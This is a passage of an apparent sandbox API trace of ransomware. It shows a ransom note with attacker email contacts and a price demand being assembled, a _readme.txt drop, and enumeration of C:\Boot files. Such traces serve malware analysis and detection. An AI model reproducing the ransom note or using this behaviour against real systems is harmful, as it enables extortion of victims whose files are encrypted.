software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.272] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.274] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*" (normalized: "c:\\boot\\ru-ru\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.274] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.274] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.275] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0184.275] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.276] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.276] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.276] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.277] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 